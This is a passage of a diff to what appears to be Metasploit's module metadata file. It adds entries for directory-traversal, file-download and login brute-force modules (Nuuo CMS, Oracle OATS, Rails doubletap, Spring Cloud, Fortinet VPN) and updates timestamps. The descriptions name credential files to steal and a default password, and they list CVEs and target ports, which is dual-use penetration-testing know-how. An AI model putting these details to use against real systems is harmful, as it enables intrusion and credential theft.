+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "auxiliary_gather/nuuo_cms_file_download": {
+    "name": "Nuuo Central Management Server Authenticated Arbitrary File Download",
+    "full_name": "auxiliary/gather/nuuo_cms_file_download",
+    "rank": 300,
+    "disclosure_date": "2018-10-11",
+    "type": "auxiliary",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "The Nuuo Central Management Server allows an authenticated user to download files from the\n      installation folder. This functionality can be abused to obtain administrative credentials,\n      the SQL Server database password and arbitrary files off the system with directory traversal.\n      The module will attempt to download CMServer.cfg (the user configuration file with all the user\n      passwords including the admin one), ServerConfig.cfg (the server configuration file with the\n      SQL Server password) and a third file if the FILE argument is provided by the user.\n      The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules\n      included in Metasploit, these files cannot be decrypted programmatically. The user will\n      have to open them with zip or a similar program and provide the default password \"NUCMS2007!\".\n      This module will either use a provided session number (which can be guessed with an auxiliary\n      module) or attempt to login using a provided username and password - it will also try the\n      default credentials if nothing is provided.\n      All versions of CMS server up to and including 3.5 are vulnerable to this attack.",
+    "references": [
+      "CVE-2018-17934",
+      "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
+      "URL-https://seclists.org/fulldisclosure/2019/Jan/51",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 5180,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-04-19 14:26:35 +0000",
+    "path": "/modules/auxiliary/gather/nuuo_cms_file_download.rb",
+    "is_install_path": true,
+    "ref_name": "gather/nuuo_cms_file_download",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "auxiliary_gather/oats_downloadservlet_traversal": {
+    "name": "Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal",
+    "full_name": "auxiliary/gather/oats_downloadservlet_traversal",
+    "rank": 300,
+    "disclosure_date": "2019-04-16",
+    "type": "auxiliary",
+    "author": [
+      "Steven Seeley",
+      "sinn3r <sinn3r@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load\n        Testing interface, a remote user can abuse the custom report template selector, and cause the\n        DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application\n        contains multiple configuration files that include encrypted credentials, and that there are\n        public resources for decryption, it is actually possible to gain remote code execution\n        by leveraging this directory traversal attack.\n\n        Please note that authentication is required. By default, OATS has two built-in accounts:\n        default and administrator. You could try to target those first.",
+    "references": [
+      "CVE-2019-2557",
+      "URL-https://srcincite.io/advisories/src-2019-0033/",
+      "URL-https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-05-23 12:35:45 +0000",
+    "path": "/modules/auxiliary/gather/oats_downloadservlet_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "gather/oats_downloadservlet_traversal",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    }
+  },
  "auxiliary_gather/opennms_xxe": {
    "name": "OpenNMS Authenticated XXE",
    "full_name": "auxiliary/gather/opennms_xxe",
@@ -15343,6 +15547,57 @@
    "notes": {
    }
  },
+  "auxiliary_gather/rails_doubletap_file_read": {
+    "name": "Ruby On Rails File Content Disclosure ('doubletap')",
+    "full_name": "auxiliary/gather/rails_doubletap_file_read",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Carter Brainerd <0xCB@protonmail.com>",
+      "John Hawthorn <john@hawthorn.email>"
+    ],
+    "description": "This module uses a path traversal vulnerability in Ruby on Rails\n          versions =< 5.2.2 to read files on a target server.",
+    "references": [
+      "URL-https://hackerone.com/reports/473888",
+      "URL-https://github.com/mpgn/Rails-doubletap-RCE",
+      "URL-https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q",
+      "URL-https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/",
+      "CVE-2019-5418",
+      "EDB-46585"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-04-21 12:00:20 +0000",
+    "path": "/modules/auxiliary/gather/rails_doubletap_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/rails_doubletap_file_read",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DoubleTap"
+      ]
+    }
+  },
  "auxiliary_gather/safari_file_url_navigation": {
    "name": "Mac OS X Safari file:// Redirection Sandbox Escape",
    "full_name": "auxiliary/gather/safari_file_url_navigation",
@@ -15479,7 +15734,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-09-17 16:58:57 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb",
    "is_install_path": true,
    "ref_name": "gather/searchengine_subdomains_collector",
@@ -15512,7 +15767,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/shodan_honeyscore.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_honeyscore",
@@ -15540,22 +15795,13 @@
    "arch": "",
    "rport": null,
    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
+
    ],
    "autofilter_services": [
-      "http",
-      "https"
+
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/shodan_search.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_search",
@@ -15826,7 +16072,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
@@ -16160,7 +16406,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/zoomeye_search.rb",
    "is_install_path": true,
    "ref_name": "gather/zoomeye_search",
@@ -16298,7 +16544,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
@@ -16331,7 +16577,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_server_info",
@@ -16400,7 +16646,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/chargen/chargen_probe",
@@ -16588,7 +16834,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/db2/discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/discovery",
@@ -16621,7 +16867,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/endpoint_mapper",
@@ -16654,7 +16900,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-12-31 14:41:33 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/hidden",
@@ -16687,7 +16933,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/management",
@@ -16720,7 +16966,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
@@ -16754,7 +17000,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/windows_deployment_services",
@@ -16919,7 +17165,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_multicast_ping",
@@ -16986,7 +17232,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-10-31 04:53:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor_router_advertisement",
@@ -17717,6 +17963,41 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/gprs/gtp_echo": {
+    "name": "GTP Echo Scanner",
+    "full_name": "auxiliary/scanner/gprs/gtp_echo",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Daniel Mende",
+      "Spencer McIntyre"
+    ],
+    "description": "This module sends UDP GTP (GTP-U) echo requests to the target RHOSTS and\n        reports on which ones respond, thus identifying General Packet Radio\n        Service (GPRS) servers. This module does not support scanning with SCTP.",
+    "references": [
+      "URL-https://insinuator.net/tag/gtp/",
+      "URL-https://www.etsi.org/deliver/etsi_ts/129200_129299/129281/08.00.00_60/ts_129281v080000p.pdf"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 2152,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-04-26 17:45:27 +0000",
+    "path": "/modules/auxiliary/scanner/gprs/gtp_echo.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/gprs/gtp_echo",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/h323/h323_version": {
    "name": "H.323 Version Scanner",
    "full_name": "auxiliary/scanner/h323/h323_version",
@@ -18290,7 +18571,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/atlassian_crowd_fileaccess",
@@ -19230,7 +19511,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-12-11 10:16:16 +0000",
+    "mod_time": "2019-02-28 16:48:54 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_directory_traversal",
@@ -19274,7 +19555,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_download",
@@ -19754,7 +20035,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/concrete5_member_list",
@@ -20314,7 +20595,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dnalims_file_retrieve",
@@ -20529,7 +20810,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/elasticsearch_traversal",
@@ -20870,6 +21151,54 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/es_file_explorer_open_port": {
+    "name": "ES File Explorer Open Port",
+    "full_name": "auxiliary/scanner/http/es_file_explorer_open_port",
+    "rank": 300,
+    "disclosure_date": "2019-01-16",
+    "type": "auxiliary",
+    "author": [
+      "小荷才露尖尖角",
+      "moonbocal",
+      "fs0c131y",
+      "h00die"
+    ],
+    "description": "This module connects to ES File Explorer's HTTP server to run\n        certain commands. The HTTP server is started on app launch, and is available\n        as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable\n        This module has been tested against 4.1.9.5.1.",
+    "references": [
+      "CVE-2019-6447",
+      "URL-https://www.ms509.com/2016/03/01/es-explorer-vul/",
+      "URL-https://github.com/fs0c131y/ESFileExplorerOpenPortVuln",
+      "URL-https://twitter.com/fs0c131y/status/1085460755313508352"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 59777,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-03-26 19:39:17 +0000",
+    "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/es_file_explorer_open_port",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/etherpad_duo_login": {
    "name": "EtherPAD Duo Login Bruteforce Utility",
    "full_name": "auxiliary/scanner/http/etherpad_duo_login",
@@ -21084,6 +21413,48 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/fortinet_ssl_vpn": {
+    "name": "Fortinet SSL VPN Bruteforce Login Utility",
+    "full_name": "auxiliary/scanner/http/fortinet_ssl_vpn",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Max Michels <kontakt@maxmichels.de>"
+    ],
+    "description": "This module scans for Fortinet SSL VPN web login portals and\n        performs login brute force to identify valid credentials.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-02-19 22:33:10 +0000",
+    "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/fortinet_ssl_vpn",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/frontpage_credential_dump": {
    "name": "FrontPage .pwd File Credential Dump",
    "full_name": "auxiliary/scanner/http/frontpage_credential_dump",
@@ -21289,7 +21660,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
@@ -21464,7 +21835,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/goahead_traversal",
@@ -21829,7 +22200,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
@@ -21874,7 +22245,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
@@ -21919,7 +22290,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
@@ -21961,7 +22332,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-04 13:37:11 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
@@ -22224,7 +22595,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-02-13 06:20:57 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_traversal",
@@ -22430,7 +22801,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-11-23 17:15:33 +0000",
+    "mod_time": "2019-02-22 09:01:11 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_shortname_scanner",
@@ -22691,7 +23062,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-24 04:24:49 +0000",
+    "mod_time": "2019-02-13 16:10:32 +0000",
    "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_vulnscan",
@@ -22822,7 +23193,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
@@ -23426,7 +23797,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
@@ -23471,7 +23842,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
@@ -23561,7 +23932,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mediawiki_svg_fileaccess",
@@ -23828,7 +24199,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
@@ -23873,7 +24244,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netdecision_traversal",
@@ -24051,7 +24422,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -24190,6 +24561,39 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/onion_omega2_login": {
+    "name": "Onion Omega2 Login Brute-Force",
+    "full_name": "auxiliary/scanner/http/onion_omega2_login",
+    "rank": 300,
+    "disclosure_date": "2019-03-27",
+    "type": "auxiliary",
+    "author": [
+      "Not So Attractive <github.com/nsa>"
+    ],
+    "description": "OnionOS login scanner module for Onion Omega2 devices.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": "80",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-04-25 20:43:55 +0000",
+    "path": "/modules/auxiliary/scanner/http/onion_omega2_login.py",
+    "is_install_path": true,
+    "ref_name": "scanner/http/onion_omega2_login",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/open_proxy": {
    "name": "HTTP Open Proxy Detection",
    "full_name": "auxiliary/scanner/http/open_proxy",
@@ -24357,7 +24761,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
@@ -24402,7 +24806,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_file_retrieval",
@@ -25335,7 +25739,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_version_enum",
@@ -25549,7 +25953,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/simple_webserver_traversal",
@@ -25804,7 +26208,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
@@ -25857,6 +26261,50 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/springcloud_traversal": {
+    "name": "Spring Cloud Config Server Directory Traversal",
+    "full_name": "auxiliary/scanner/http/springcloud_traversal",
+    "rank": 300,
+    "disclosure_date": "2019-04-17",
+    "type": "auxiliary",
+    "author": [
+      "Vern",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability\n        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,\n        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring\n        Cloud Config listens by default on port 8888.",
+    "references": [
+      "CVE-2019-3799",
+      "URL-https://pivotal.io/security/cve-2019-3799"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8888,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-04-26 07:15:39 +0000",
+    "path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/springcloud_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/squid_pivot_scanning": {
    "name": "Squid Proxy Port Scanner",
    "full_name": "auxiliary/scanner/http/squid_pivot_scanning",
@@ -26099,7 +26547,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/surgenews_user_creds",
@@ -26229,7 +26677,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sybase_easerver_traversal",
@@ -26273,7 +26721,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
@@ -26320,7 +26768,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_logfile",
@@ -26446,7 +26894,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-16 14:42:12 +0000",
    "path": "/modules/auxiliary/scanner/http/title.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/title",
@@ -26566,6 +27014,52 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/totaljs_traversal": {
+    "name": "Total.js prior to 3.2.4 Directory Traversal",
+    "full_name": "auxiliary/scanner/http/totaljs_traversal",
+    "rank": 300,
+    "disclosure_date": "2019-02-18",
+    "type": "auxiliary",
+    "author": [
+      "Riccardo Krauter",
+      "Fabio Cogno"
+    ],
+    "description": "This module check and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.\n\n        Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,\n        woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,\n        manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic",
+    "references": [
+      "CVE-2019-8903",
+      "CWE-22",
+      "URL-https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/",
+      "URL-https://snyk.io/vuln/SNYK-JS-TOTALJS-173710"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-03-11 22:23:11 +0000",
+    "path": "/modules/auxiliary/scanner/http/totaljs_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/totaljs_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/tplink_traversal_noauth": {
    "name": "TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability",
    "full_name": "auxiliary/scanner/http/tplink_traversal_noauth",
@@ -27111,7 +27605,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
@@ -27178,7 +27672,7 @@
    ],
    "description": "This module exploits a content injection vulnerability in WordPress\n        versions 4.7 and 4.7.1 via type juggling in the REST API.",
    "references": [
